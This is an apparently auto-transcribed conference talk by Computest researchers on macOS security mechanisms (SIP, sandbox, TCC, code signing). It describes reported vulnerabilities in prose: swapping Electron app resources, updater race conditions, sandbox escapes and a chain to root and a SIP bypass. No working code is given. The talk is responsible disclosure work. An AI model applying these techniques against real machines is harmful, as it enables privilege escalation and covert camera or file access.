 Compitest, Thais Alcamada and Dan Kuiper, they're going to explain the one and only non-hackable machine people are using daily basis, Mac OS, that it's actually not non-hackable. They're going to explain how to escape the sandboxes, and how to pass your transparency consent and control mechanisms. I would say, I don't know who starts Dan, or who starts Dan. All right, thank you. All right, so my name is Dan Kuiper. I'm here with my colleague, Thais Alcamada. We work for Compitest, which is a Dutch cybersecurity full-service company. We do everything from pen testing to intimate response. If you have any further questions after this talk, we have a big tent on the retro square full of arcade games. So if you have any questions, just drop by. We'll give you a beer, and I can answer all your questions. So today, we would like to talk to you about the local security measures that are in Mac OS. So suppose you have code execution as an unprivileged user in the Mac OS. How can you abuse that privilege to escalate privileges to either a higher user, or to bypass a sandbox, or to bypass the new TCC mechanism in Mac OS? So the presentation is divided in two parts. First I will explain all the local security mechanisms that are implemented in Mac OS currently, and then Thais will jump into the cool stuff by actually showing how you can bypass it. So there are a couple of security mechanisms in Mac OS, and I'm going to cover them one by one. And the first one is code signing. So code signing was introduced in Mac OS Lion, and it means that every binary now has a cryptographic signature. So if you want to run a unsigned binary, the user first has to accept that by going to the system privileges and saying that it wants to run the binary. So it's not actually mandatory for everything, but most applications will have a valid signature. So the verification for this is handled by a kernel extension and the MVDemon which uses SpaceDemon. So apart from code signing, some apps also have entitlements, and entitlements are some very fine grained security rights that an application can have. It's a key value dictionary, and it's included into the code signing step. And many of the entitlements are only allowed on binaries that are signed by Apple. So typically what will happen if you need special permission for a part of the operating system, then they give that permission to a very small service, and it communicates over XPC. So the larger binary doesn't actually have the entitlements to do, well, the important stuff in the operating system, it's just handled by a very small demon to make the attack service smaller. So if an application has a specific entitlement and it is vulnerable, then you can just copy that binary to a machine you have access to and then exploit that vulnerability and you will have the entitlement as well. So this is how you can see what code signature a binary has. Is it readable actually on the screen? So it's just a cryptographic signature. You can also see the entitlements a binary has. This is the PS binary, and it has a specific entitlement to read process information of other processes. It's the task force read entitlements, and that is only given to a few binaries on your MacOS installation. So the signature itself is included in the MagO binary in a special section called the code signature. You can extract it and see the certificate yourself if you want to. So the executable self is signed, but in an app bundle, all the resources are also signed. Then the resource signing is stored in a separate file within the app bundle. That if you launch an application, the interesting part is that only the app, the actual binary is checked for a valid signature. So resources are only checked when the app is first downloaded or first run, but after that only the binary itself, the signature, is validated. So apart from that, you have something what is called the hardened runtime, which is now mandatory for applications in, for example, the Mac App Store, and its purpose is to protect against all variants of process injection. So if you have enabled hardened runtime for your app, it prohibits the use of certain environment variables to override library loading, but it will also disable just in time compilation. It will check code signatures of libraries as well rather than only the binary, et cetera, et cetera. Then you have the sandboxing implementation, which was introduced in Leopard, and it uses an allow list for syscalls a process can use. It's handled by a kernel extension, but most of the parsing is done by a user space demon. The sandbox is configured using a profile, which is written in the scheme language, and most profiles can be found on the system library sandbox profiles directory. And the sandbox has hooks all across the kernel source tree. So it can be very fine grained in what the sandbox will actually allow or block. So a profile can depend on the entitlements of the application. So if you have a certain entitlements in your application, it can use a different sandbox profile to allow you to read or use certain syscalls, for example. This is an example sandbox profile for iMessage in this case. So it has some read and write permissions, and it has some permissions to communicate with other services. System services from macOS often have a custom sandbox profile. All apps that are installed from the App Store have a fixed Mac App Store sandbox profile, which is just a general profile. But apart from that, rarely any app uses a sandbox that is not installed via the App Store. Exceptions are things like Chrome or Firefox, et cetera. So you also have some containers which rerout your home directory to a container within your library folder. But this is actually not a security mechanism. This is just to make the sandbox implementation easier for already existing apps. So another important security measure is system integrity protection, or SIP. It was released in El Capitan. And it was originally to create a trust boundary between root and kernel level. So it is often referred to as rootless, or internally it's referred to as CSR. And it restricts modifications or kernel and system extension loading and process debugging, et cetera. So the idea here is that even if you have root privileges on your account, that you're still not able to alter the most important parts of your system. The reason for this is that on most Mac OS installations, there's only one user, which is also the administrator user. So typically, you would be only one exploit away from getting full system access, but SIP prevents you from modifying important system files. For example, if you want to remove your shell, it will say it cannot do that. And that's because the bin directory or all application in there are protected by system integrity protection. You can also not attach a debugger to system processes, which is also prevented by SIP. Actually, SIP is just a sandbox profile, which is called Platform Profile. The configuration can be found in your system. And it's enabled on Boots using a NVRAM variable. So you can disable root of a SIP by just changing that variable. However, changing that variable is protected by SIP as well. So you will need to boot into another operating system or an operating system that will allow you to disable this. For example, the Mac OS recovery installation. So in order to allow SIP to work, the entitlement system is used as well, because for example, the PS binary needs some very specific permissions for which entitlements are used. So SIP also prevents app reading from certain sensitive locations, like your mail database, et cetera. And these are called data vaults. And only apps with very specific entitlements can read and write into that location. So even if you have full system access, that still doesn't mean that you can read the user's local email database, for example. So you can think of SIP like something like a reverse sandbox. Sandbox limits what functionality a process can use. But SIP tries to protect functionalities by limiting which processes can use that functionality. So relatively new or unknown is TCC, Transparency, Consent, and Control. And those are these pop-ups you might have seen, like this application that requires once access to your download folder or to your camera, et cetera. It was introduced in Mojave and like a dynamic sandbox for private sensitive subsystems. So the implementation looks at your bundle ID and your developer ID. And if that matches with the internal TCC database, the permission is grounded. And otherwise, the user will get a pop-up to confirm if the user wants to allow certain action or not. For this, your system will run a TCC demon. Typically, you will have multiple demons running, one for each user and one for the system user or for the entire system. And they use an internal SQLite database to actually manage those permissions. It's, however, not able to just change that database yourself because the database itself is protected by system integrity protection. So what happens if some system actually requests access to your microphone or your camera? Well, the way it's implemented is if you want to access the microphone, you have to ask Core Audio to get access to the microphone. Core Audio will forward that request to the TCC demon, which will look up if this app has that permission or not. And if the app doesn't have the permission yet, it will forward that request to the UI notification service. And that's the only service that's allowed to show the pop-up and to make changes to the TCC database. So you can see that in the entitlements of the TCC demon. Only the notification center UI is allowed to make decisions about what gets in the database and what didn't get made it in the database. After which, the TCC demon will actually make the changes in the database itself. But the decision is handled by the notification center. So another security feature is signed system volume. So your system folder is volume is the volume where all the applications or the macOS installation is stored. So this is different than what used to be. Typically, you would have one partition which would contain both the operating system and all user files. Well, now that's different. Those have been split. You now have a system volume which will contain all the macOS installation files. And you have your data container which will contain all user files. Those are overlaid. And it can most commonly described as a bi-directional wormhole in path traversal, et cetera. Because everything had points to, well, either the system volume or the data volume. And how it's implemented is that the system folder is mounted read-only. So you are not allowed to make changes to the system partition. However, that also means that, well, if you have a kernel vulnerability, for example, you could just remount the system partition and then make changes. And so now they upgraded that by also adding a cryptographic signature or overall data on the system volume. This is implemented by using a Merkle tree which is validated during boot. The hashes of every file are stored in the metadata data of APFS. And on the root node, this is called a seal. And the seal is signed by Apple. And if the seal is broken, so if you do make changes to the system partition, for example, because you have kernel privileges, then the seal would be broken and the system would restore from a previous snapshot the next time you will reboot. So how are updates implemented then? Well, your system has apparently hit an update volume, which is a snapshot of your current back-of-ass installation. So batches are applied to the snapshot. And if everything succeeds, the snapshot is sealed and it will be booted. But however, if the update fails, the system can use it previously stored snapshot, which will have a valid seal and boot using that snapshot. Well, you can see if your current snapshot disk has a valid seal using DiskUtil. So these are the most common Mac OS local security systems that are trying to prevent attackers from getting full access to your system. The new upcoming version of Mac OS will have some extra features. I think these are the main ones. The first one is that system apps will no longer run from non-default locations. So if you have a system app and you move it to your home directory or you copy it to your home directory, it will no longer launch. Secondly, Mac OS will now notify you when launch demons are being added to your system. And they will be easier to manage within your system preferences. So you know which applications will start at boot. And most importantly is that Gatekeeper will now prevent modifications to apps after the first launch. Typically, Gatekeeper will only be used at the initial launch. So the first time the application is launched. But now Gatekeeper will prevent modifications even after the applications has already been started once. This is implemented using SIP. And modifications to apps are only allowed if the app that is making the modification is signed with the same certificates as the app you want to change. So this means that apps can update themselves, but no other apps can make changes to other apps. There is a whitelist for this. For example, if you have an update service like Spark or something, you can say, OK, Spark, I also accept that certificate to make changes to my app. So to give you an overview, these are the most important security mechanisms. So you have code signing to make sure that the application was published by specific organizations. You have the sandbox, which handles the static permissions. You have SIP to guarantee the integrity of the system as a whole. DCC to have user control permissions like camera access, et cetera, and the signed system volume to prevent modifications of system files. So this is the bug bounty description from Apple. As you can see, they really believe in TCC because, well, a bounty for TCC can go up to $100,000 if you know how to find a way to access the camera, even though your application doesn't have the permission for this. So Thais will now show you how you can do that, actually. Thais. Yes, thank you. So this is all theory. And it's, of course, much more interesting to have some practical examples to really understand how these security measures work. So we're going to look over a couple of different vulnerabilities to illustrate whether the security measures work or not, and if they were bypassed or if they prevented something. Most of these are found by us. But occasionally, we mentioned some vulnerabilities found by other people as well. In those cases, we hope to make this clear. So first of all, Electron. Electron is a framework you can use to develop applications. And it's basically a Chrome runtime combined with a JavaScript web application fused together to create an application. And as Dan just mentioned, the permissions for TCC are stored in a database based on the bundle identifier. So something that specifies an application in the developer identifier, like a team or an organization. But the version of the application or the location where the application is stored are irrelevant here. And also the code sign-in check after the first launch only checks the executable itself, not all of the embedded resources. The libraries and frameworks are checked if the hardened runtime is used. But this does mean that if you have some interpreted code, like JavaScript, or you embed some Python scripts in your application, then that code is not validated by the code sign-in check that is performed when you launch an application. And as I just said, Electron applications contain a lot of JavaScript for their code, which also means that those resources are not checked when you launch the application. So in basically every Electron app, you can do the following attack. You copy the application to a writable location. You can do this if you have some access to the machine already, so you cannot do this remotely. And you take out the JavaScript. You place it with some malicious JavaScript. You launch a modified application. And now you have the TCC permissions that your original application had. So even if your application doesn't have access to the webcam, but you copied an application that did have access to the webcam, then you can also access the webcam without having to ask the user for permission. And for some reason, people really love to write Electron applications that have access to your webcam and your microphone. All of these are developed using Electron. And as a user, there's really not a good way to protect yourself from this. But luckily, there have been some developments on fixing this. So Electron is working on something called Electron ASR Integrity, which is basically they do some code signing step of their own resources that can be checked when the application is launched. But it's not yet officially supported as far as I know, so it also doesn't work very well. But this is a technique you can apply more generally as well. So we're just bashing Electron here, but it can be used on many applications because you can often find an older version of an application that was not protected as well. So for example, an older version that didn't use the hardened runtime. So then you can swap out a library with a different malicious library, launch the application, then abuse the permissions. Hopefully, the changes in Ventura that Dan mentioned, that should prevent modification of those files in an application, should prevent this attack. Of course, it's still in beta, so we don't really know it yet if it's going to work. But it looks like Apple is making some steps to make an attack like this harder. The next one, this is about Adobe Acrobat and PrivList Updaters. There are some instances where Macs are being used by people with a normal user account instead of an admin user account. For example, it may be a kid who has a computer, but their parents have an admin account or maybe a computer in a school or something like that. But a non-admin user is not allowed to change the application folder. And this can be a problem if you have an application that wants to also update itself. And there are many applications that really you want to update as quickly as possible. If you have Chrome or something like Adobe Acrobat, then there can be nasty exploits that can be dangerous and you want to protect against it by updating quickly. But if the admin never logs into the machine, how can you update those applications because they can't write to the applications folder? So how can you install updates in this case? Well, many people found the solution. So you install a very small service, a separate service, and you run that service with root privileges. And you use that only to do the installation step. So you have this one service that can update the application, but then the rest of the application wins as a normal user, which you can have a separate service with a permission to update it. Now, it's important that you do this securely, of course. So not every application can elevate its privileges. So there's basically two things that you need to check here. So the application has an update, and then it hands that over to that service. And there's two things that it needs to check. First of all, it should check if the request really comes from the original application. If something else with some malware is requesting an update, then it's probably it should be ignored. And it should also make sure that the package is not manipulated in some way, for example, by checking a cryptographic signature or something like that. And even though there are two things that can go wrong here, it is quite common that both of them are implemented incorrectly. So what you can see is often a incorrect code signing check or some form of process injection combined with a this is a time of check, time of use vulnerability. So basically, it means that it checks the signature. But then before it actually uses the installation package, it is changed. So it checks something first. It's correct. And then before it installs it, it was modified. And if both of those things go wrong, then you often have a way to gain privilege escalation because you can install a package. It usually means that you can also elevate privilege just to root. So it turned out that Adobe Acrobat was vulnerable. This was found by Yuo Binsun. There was no code signing check at all. That check was completely missing. And it was possible to use a sim link for the update package. So it would check the signature on the package. And then they would quickly change the sim link. And then it would install something different than what it had checked. And there's also a nice write up about this vulnerability that Yuo Binsun published. But then they made some changes. And they didn't really do everything correctly. So at around the same time, Cecaba Fitzl and I looked at it. But he was just a little bit faster with reporting it to Adobe. So the code signing check that they implemented was wrong. They used their code signing binary in a way that was easy to manipulate. And it was also possible to create a hard link to the update package. Because they moved it to a different location instead of copying it. The hard links were maintained. So you could keep modifying the update package after they had checked it. So a little bit later, I also looked at it. And then what I noticed there is that they started on writing the correct code signing check. But they just left it unfinished for some reason. It would always return through the apparently they were still working on it, but that released it anyway. And I found also a very neat trick to still modify the package in a check time of use way. So if you have a file descriptor to a file, so if you open a file, then it will check if you have permission to read or write that file. And then you get an open file descriptor. But if the file is then moved and the permissions are changed, as long as you have that file descriptor, you can keep modifying that file. So until you close it, you still have access. And because they moved the file, you could keep this file descriptor open and then still rewrite the contents of that file in between the check and the use. So what this really illustrates is that this idea that you can separate out dangerous operations into a separate small privilege process and then use XPC as a way to communicate with that, but also that code signing is a very important part to make this work correctly. Now, there have been many applications that have had similar vulnerabilities in the past. So Google Chrome, at some point, had vulnerabilities like this. The Microsoft Auto Update tool and Microsoft Teams has its own updater that had similar vulnerabilities. And another thing to mention about this is that there's nothing that will uninstall that updater if you delete the application from the applications folder. So if you have ever used Adobe Acrobat and then deleted it again, then you may still have a very old, outdated, vulnerable version of that updater installed. And then any application can still communicate with it because it still exists. So maybe the changes in Ventura to launch demons might make it easier to manage this. I haven't checked that, but it would be very welcome to make sure that you can easily remove stuff like this because checking those folders, normal users are not going to do that. And the next one, this is in the Store Privileged Task Service. So this was a service installed within macOS, so not a third-party application. This is a service similar to the privileged updaters from the previous step. But this one is used for installing updates from the Mac App Store. So this service is running as a root, and it can do a couple of things similar as before. They needed root privileges for certain steps, so they created a separate privileged tool to do just those steps, and then other things can request it to do that. So for example, it can move the application to a different location, it can remove the quarantine flag, which is applied to files you have downloaded from the internet, and something about managing receipts. And this service is also missing any check on what application was requesting it to do something, which made it very easy to write a sandbox escape because you can write a new application. You can ask this service to remove the quarantine flag because if a sandbox application creates a new file, it's always quarantined, just like if you downloaded it, which you could remove it and then launch the application to escape the sandbox. But we found this, and we thought, well, we can probably do more than this because we can also move things around as the root user. And it's generally something you can use for privilege escalation. But it's turned out to be quite a challenge to do correctly because this process was sandboxed. So what this basically meant is that we could only move directories and not separate files, which made it quite tricky. This is one part of the sandbox profile of this service. The most useful part here is the second reg X, which basically means that we can move any directory as long as it contains .app somewhere. Spent quite a lot of time on getting this to work. We tried a couple of different things, but we had to deal with the science system volume, which means that we cannot override any existing applications. You also want something that runs as root, and applications generally don't run as root. So it was sort of conflicting requirements that made it hard to find what we could do. Then at some point, I found something that I thought could work. I could override MRT.app. This is the malware removal tool, which can be, it's an application running on macOS that can be used to delete malware from your computer, and it can be updated independently of the rest of the system, which means it's not on the system volume. But I developed this exploit, I sent it to Apple, and then they asked me, well, does it also work if you have SIP on? And then it turned out that in the virtual machine I was using, I had turned off SIP to debug something, and yeah, it wouldn't work on a system with SIP on. So I had to start looking again. But then finally, after a while, I found that I could create a new authorization plug-in and then auto-activate that, and that would give me root privileges. So what this really illustrates is that the science system volume and SIP made this really hard to develop this attack, also the sandboxing, of course, made it quite difficult, but in this case, the sandboxing profile was really way too broad. There were a lot of things that were allowed that weren't intended to be allowed, but they could have made that a little bit stricter, which is also what they did when they finally patched this. Next one, this is a bit of a weird one. So this is about open and safe panels. So this is an open panel. It looks really boring, like you see 100 times every day, but this is actually quite technically quite interesting, because in a sandboxed application, the application cannot see all your documents, but you want to open a document in that application, but the application cannot know what documents you have because it's sandboxed. So the way Apple solved this is by making this window. This window is part of the application, but the contents of the window are actually being drawn by a different process. There's a open and safe panel service, which does have access to all files. It's not sandboxed, and it's drawing this into a different process to show you all of the files that you have. And when you select the file and then click Open, then the application gets temporary access to that file so it can open it. And this kind of technology is used throughout the system to separate out different parts into different components with different privileges but making it look like it's one thing in the UI. But apparently they didn't really think about the security of this very much because there was a method that you could call. The class is a remote view, so from the point of view of the application. And one thing you could call is snapshot. And if you do that, it would take a picture of the contents of the view and return that to the application. So, yeah, in this case, when you open a open panel, you can get a list of all of the files the user has, get previews of certain files. Yeah, this was not intended for sandbox applications because the entire reason why this is here is that the application can't know what documents you have. But apparently they added this method to take a snapshot. We created a demonstration of this here. We open a panel and now we copy the view into here. And this now is part of the application and that one is a remote view as I described earlier. So, what the open panels really illustrate and what I think is interesting about it is that the sandboxing creates all sorts of weird attack servers that not many people will look at. There's all of these weird edge cases where things that are sandboxed within the UI need to do certain things. So, there's a lot of parts that haven't really got much attention either from Apple or security researchers. Now, the next one is a sandbox escape that we found and reported to Apple, which is interesting because it actually abuses the sandboxing container functionality. In a sandbox application on macOS, you're allowed to launch a new process. On iOS, you cannot do this, but on macOS you can. But that process inherits the same sandbox as your application. So, if you cannot access a file, you can just use God to read that file. One thing that's interesting about that is that you can just also launch another application from within your own sandbox. And this generally works except for one thing. You cannot initiate a sandbox if you are already sandboxed. Then the system will terminate that process. So, if you try to launch Safari from within a sandbox application, then the kernel will terminate it because Safari should sandbox itself, but it tries to do that while already sandboxed so it cannot do that. So, just as an experiment, I tried to launch all of the applications from within a sandbox application, and I noticed something quite interesting which was that system preferences was working just like normal. Many other applications, they filter run or they hang or something, some error popped up. But system preferences was working. And system preferences is a very sensitive application because you can manage many security and trust settings and they all worked even within my sandbox. So, I tried to figure out why, and it turned out that similar to the remote view that we saw before, system preferences is also separated into many different processes. So, there are system preferences itself, but then every panel of system preferences is another process. And there can be even another level of indirection, the advertising is yet another level of indirection. And even though system preferences was now suddenly sandboxed, the other services were not and could just work normally. So, the way this works is that those Apple installed system preferences panels are those services, so separation of services. But third parties can also install new plugins for system preferences. And those are bundles, which is quite different from the XPC services because it's basically just a plugin that can be loaded. Now, this was a fun trick, but it's no sandbox escape yet. But I noticed something that was being created into the container folder of the application. There are some cache files left over by system preferences, including one that's called the user cache. And this is a list of all of the third-party system preferences plugins that were installed. And it was created within the container of my application, which meant that I could also manipulate it and modify it or create some new content and then launch system preferences. So, the reason this file exists is to make, so it doesn't need to index all of your plugins every time you launch it. But if I create this file, then I can inject my own new system preferences plugin and then when it launches, it will think there's a new plugin, namely my application or my bundle. But then, I still needed to activate it. I didn't want to wait for the user to click on it. So, I needed one more step. So, there's a URL handler. You can use to open certain system preferences paints, but it didn't work for those third-party preference paints. But there was something else I could use. You can add an alert to system preferences. And whenever a new alert is added, then the next time you open the application, it will automatically open the preference pane that added that alert. So, I could do that from a third-party preference pane. So, basically, the attack is as follows. I create a new cache file that says that there's a new bundle as a new plugin. I add an alert for it, and then I start system preferences within the same sandbox, which means that it loads that plugin into something else, into an in-sendbox application, and then, therefore, my code is in sandboxed. You'll also have a video of that. First, it demonstrates that the process really is sandboxed. Now, the open system preferences, but it was really quick, it immediately accident and opened the calculator to demonstrate that we can execute arbitrary code. And the fix was really simple. They just check if it's sandboxed, and if it is, then it quits immediately. It's just probably just three lines of code or something like that. Now, the next part is a bit... I have to keep it vague, because the vulnerabilities are not all fixed by Apple. They're still working on the fixes. It should get fixed with Ventura, but I'm not completely sure of that yet. But what I want to talk about is some generic process injection technique that's supposed to have vulnerabilities like that. So, process injection is basically the way that one application can execute its code as if it is another application. So, we can be shown that you can use that to communicate with the privileged helper tool if you can inject into that application. You can abuse the TGC permission, like an electron application. But we wanted to investigate what can you do if you have a generic technique and you can inject it to any application, even Apple's. And we found some neat tricks to use that to escape the sandbox, elevate privileges to routes, and bypass the SIP file system restrictions. A sandbox escape is a bit boring, because if you're sandboxed and you can inject into a non-sandbox application, yeah, then you have escaped the sandbox already. So, I can't really disclose much more about those details, but hopefully we can publish more about this soon. But privilege escalation, we can talk a bit more about that. There are certain applications that have entitlements for the authorization services, which can include the permission to install Apple software, which basically means that they can install packages signed by Apple without the user having to enter their password. So, as long as it's signed by Apple, they can sign on the install a new package. This is used, for example, by bootcamp assistant or install command line developer tools. And there's also a nice package we can use. It was found by Elias Morat. This package, if you install it to a disk, then in its post install script, so after it has performed the installation, it will run a script from the disk you installed it to. So, it checks if a certain file exists, and then it runs it. But it doesn't actually check that the disk you install it on is a macOS disk, so you can just install it to a disk image or a ROM disk and then create a shell script there and then it will execute that as root. So, this is a way you can use this to take one entitlement and then use that for privilege escalation. And finally, we found a application macOS update assistant. We found this in the beta installation disk image, and this has a very powerful entitlement. This basically means it can access every SIP protected file, and it's also heritable. So, any processes it spawns can also do that, which is easy for us because you can just spawn a shell. And this application can then be used to, yeah, write to any SIP protected location. And hopefully the restrictions that Dan mentioned for Ventura about processes being run in a different environment should prevent this as well. We have a quick video of that. I hope this is readable. So, first it demonstrates that it's sandbox application, and then the first step will escape its sandbox, elevates privileges, which is a bit slower because of all of the disk image stuff. And then the next step is to SIP bypass. As you can see, it has spawned a root shell, not just a root shell, but we also demonstrate that we can write to the system policy configuration directory. And this directory is a directory protected by SIP, and this directory is used to keep track of the kernel extensions that you have approved. So, if we modify that one of these files, then we can load a kernel extension without user approval. So, combine this with a vulnerable kernel extension and you have kernel code execution. And it's all of this, which basically is just one type of vulnerability. Now, very quickly, because I'm a bit low on time, our thoughts on this. So, TCC is an interesting idea, but it's still pretty new when many third-party developers are not aware of it. So, many applications are vulnerable, which makes it easy to abuse its permissions. Sandboxing is very powerful, but there are also very weird edge cases that are not being looked at, because many people look at iOS Sandboxing, so the lower kernel level stuff is being looked at often. But the higher level stuff, like taking screenshots of open panels is not being looked at as much. Finally, process injection is an interesting technique, and as far as I know, a similar security boundary between processes doesn't exist on Linux or Linux. As far as I know, we're not very specialized in that. So, these types of vulnerabilities don't really apply there, which basically means that the fact that they don't work well doesn't make it less secure. Yet, on the other hand, what we also showed at the end is that those process injection vulnerabilities can now have a very large impact, because you can use the same technique for escaping the sandbox, privilege escalation, and bypassing SIP. So, thank you. I think we are out of time, but if you have any questions, then feel free to visit us at our tent. Yeah, thank you, guys. Just one thing. We have some write-ups about a couple of these vulnerabilities on our blog and some other cool stuff, like the things we talked about yesterday, in the day before, so check it out if you want to read more. And this is the link to Rick, right? Definitely. I'm gonna switch back to Windows. We can take one or two questions if people are interested in asking a question. We have so many questions, but I will be in your tent tonight. Let's give a final applause for Dan and... Thank you. Thank you. Nice. Thank you very much.